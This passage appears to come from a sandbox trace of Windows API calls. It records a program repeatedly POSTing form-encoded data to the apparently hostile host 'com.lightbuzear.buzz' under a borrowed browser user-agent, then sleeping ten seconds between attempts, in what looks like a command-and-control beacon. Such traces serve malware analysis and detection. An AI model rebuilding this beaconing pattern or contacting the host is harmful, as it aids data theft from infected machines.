hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb68 [0201.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb20 [0201.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb68 | out: hHeap=0x4780000) returned 1 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0201.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb20 | out: hHeap=0x4780000) returned 1 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9d98 [0201.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0201.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9d98 | out: hHeap=0x4780000) returned 1 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9d98 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0201.125] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829dd0 [0201.125] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0201.126] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0201.126] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0201.126] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0201.126] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829dd0 | out: hHeap=0x4780000) returned 1 [0201.126] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0201.126] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0201.126] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0201.126] FreeLibrary (hLibModule=0x71570000) returned 1 [0201.126] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0201.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0201.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0201.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0201.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815388 | out: hHeap=0x4780000) returned 1 [0201.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814d20 | out: hHeap=0x4780000) returned 1 [0201.127] Sleep (dwMilliseconds=0x2710) [0201.143] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0201.143] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0201.143] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0201.143] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0201.143] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0201.143] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0201.143] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0201.143] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0201.143] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0201.143] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa78 [0201.144] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0201.144] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f808 [0201.144] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa78 | out: hHeap=0x4780000) returned 1 [0201.144] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0201.144] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0201.144] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fa78 [0201.144] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814d20 [0201.144] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814d20 | out: hHeap=0x4780000) returned 1 [0201.144] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0201.144] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814d20 [0201.144] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0201.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0201.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0201.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0201.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0201.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481faf0 [0201.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0201.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481faf0 | out: hHeap=0x4780000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815388 [0201.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0201.145] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815388 | out: hHeap=0x4780000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815388 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0201.145] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48153b0 [0201.146] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0201.146] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0201.147] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0201.147] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0201.147] FreeLibrary (hLibModule=0x71780000) returned 1 [0201.147] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0201.147] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0201.147] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0201.147] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0201.148] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0201.148] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0201.148] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0201.148] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0201.148] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0201.149] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb20 [0201.149] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481faf0 [0201.149] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb20 | out: hHeap=0x4780000) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0201.149] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481faf0 | out: hHeap=0x4780000) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481faf0 [0201.149] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48153b0 [0201.149] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0201.149] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48153b0 [0201.150] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0201.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829f10 [0201.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0201.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0201.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0201.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0201.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0201.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0201.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0201.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0201.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0201.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb80 [0201.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0201.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb08 [0201.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb80 | out: hHeap=0x4780000) returned 1 [0201.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0201.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb08 | out: hHeap=0x4780000) returned 1 [0201.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fb08 [0201.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a050 [0201.151] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a050 | out: hHeap=0x4780000) returned 1 [0201.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0201.162] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0201.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0201.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0201.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0201.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0201.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0201.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0201.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0201.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0201.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0201.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb38 [0201.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0201.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb98 [0201.164] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb38 | out: hHeap=0x4780000) returned 1 [0201.164] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0201.164] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb98 | out: hHeap=0x4780000) returned 1 [0201.164] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829f38 [0201.164] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0201.164] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0201.164] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829f38 | out: hHeap=0x4780000) returned 1 [0201.164] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d80 [0201.164] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0201.164] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d30 [0201.164] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0201.164] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0201.165] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0201.165] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0201.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d30 | out: hHeap=0x4780000) returned 1 [0201.165] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0201.165] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0201.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0201.165] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0201.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0201.165] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0201.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0201.165] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0201.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0201.165] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb38 [0201.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0201.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb98 [0201.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb38 | out: hHeap=0x4780000) returned 1 [0201.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0201.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb98 | out: hHeap=0x4780000) returned 1 [0201.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829f38 [0201.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0201.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0201.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829f38 | out: hHeap=0x4780000) returned 1 [0201.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829dd0 [0201.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0201.166] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829e98 [0201.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0201.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0201.167] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0201.210] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0202.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829e98 | out: hHeap=0x4780000) returned 1 [0202.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0202.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0202.274] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0202.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0202.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0202.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0202.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0202.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f9a0 [0202.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb38 [0202.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0202.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb38 | out: hHeap=0x4780000) returned 1 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a000 [0202.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0202.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a000 | out: hHeap=0x4780000) returned 1 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829ec0 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0202.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829e98 [0202.276] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0202.282] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0202.282] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0202.283] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0202.283] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829e98 | out: hHeap=0x4780000) returned 1 [0202.283] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0202.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0202.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0202.283] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0202.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0202.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0202.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0202.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0202.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0202.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0202.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb38 [0202.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0202.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb98 [0202.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb38 | out: hHeap=0x4780000) returned 1 [0202.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0202.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb98 | out: hHeap=0x4780000) returned 1 [0202.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829fd8 [0202.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0202.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0202.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fd8 | out: hHeap=0x4780000) returned 1 [0202.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829da8 [0202.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0202.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829e70 [0202.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0202.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0202.285] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0202.285] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0202.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829e70 | out: hHeap=0x4780000) returned 1 [0202.286] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0202.286] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0202.286] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0202.287] FreeLibrary (hLibModule=0x71570000) returned 1 [0202.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0202.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0202.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829f10 | out: hHeap=0x4780000) returned 1 [0202.287] HeapFree (in: 